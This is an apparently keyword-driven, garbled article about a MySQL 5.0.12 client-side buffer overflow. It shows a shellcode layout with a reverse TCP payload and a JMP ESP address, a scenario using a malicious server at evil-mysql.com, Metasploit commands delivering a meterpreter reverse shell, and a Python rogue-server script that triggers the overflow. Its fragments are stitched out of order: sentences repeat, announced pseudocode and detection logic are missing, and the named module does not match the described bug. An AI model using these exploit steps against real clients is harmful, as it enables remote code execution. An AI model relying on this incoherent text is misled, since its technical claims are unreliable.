Introduction: Why a 20-Year-Old Bug Still Matters In the world of cybersecurity, few pieces of software have stood the test of time like MySQL. Originally released in the mid-1990s, MySQL became the backbone of millions of web applications, from small WordPress blogs to massive enterprise systems. By 2005, version 5.0.12 was a landmark release, introducing views, stored procedures, and triggers. But it also introduced something else: a critical vulnerability that would echo through penetration testing manuals for a decade.
[ NOP × 200 ] [ shellcode (reverse TCP) ] [ padding to offset 264 ] [ 0x7C86467B ] // JMP ESP in kernel32.dll When the return address is overwritten, execution lands in the NOP sled, then shellcode runs – giving the attacker a command shell on the victim’s machine with the permissions of the application that called MySQL (often SYSTEM or a web server user). This exploit is not a remote server compromise in the traditional sense. Instead, it turns the client into the victim. Here is how an attacker would leverage it: Scenario A: Malicious MySQL Server An attacker hosts a MySQL server on a public IP, say evil-mysql.com:3306 . Then they use social engineering, SQL injection, or configuration files to trick a developer’s tool (e.g., mysql.exe , mysqldump , a PHP script using mysql_connect() ) into connecting to that server. mysql 5.0.12 exploit
use auxiliary/server/mysql/mysql_yassl_hello set SRVHOST 0.0.0.0 set PAYLOAD windows/meterpreter/reverse_tcp exploit When a MySQL client connects, the module delivers the overflow and returns a shell. Snort or Suricata rules could flag suspicious handshake packets with a version string longer than 255 bytes. Example detection logic: Introduction: Why a 20-Year-Old Bug Still Matters In
An attacker-controlled server can crash the client application or, more dangerously, execute arbitrary code on the client machine. Part 2: Technical Deep Dive – How the Overflow Works The Affected Code (Simplified) While the full source of MySQL 5.0.12 is available, the critical segment looks roughly like this (pseudocode reconstructed from analysis): But it also introduced something else: a critical
import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', 3306)) s.listen(1) conn, addr = s.accept() # Send handshake packet with long version string version = b"1" * 500 # Overflow trigger # ... (full protocol packet building omitted for brevity) conn.send(b'\x0a' + version + b'\x00'*20) # Very rough conn.close() If the client ( mysql -h malicious_host -u root ) crashes, it is vulnerable. The Metasploit Framework historically included: